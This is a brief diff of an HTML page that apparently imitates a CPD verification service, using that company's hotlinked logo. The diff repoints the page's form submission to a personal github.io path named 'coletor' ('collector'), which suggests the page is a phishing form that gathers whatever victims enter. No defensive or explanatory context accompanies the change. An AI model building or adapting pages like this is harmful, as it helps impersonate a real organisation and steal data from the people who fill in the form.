--- a/index.html
+++ b/index.html
@@ -110,7 +110,7 @@ body {
   <img src="https://www.cpdverificationservice.com/uploads/1/2/6/8/126857925/cropped-cpd-logo-clear-1.png" width="100" height="100" alt="Logo da Empresa">
 </div>
 
-<form action="https://joabsm.github.io/suportecpd/">
+<form action="https://joabsm.github.io/coletor/">
   <h2>Mediante estes termos</h2>
   
   <!-- Aqui você pode colocar os campos do seu formulário -->
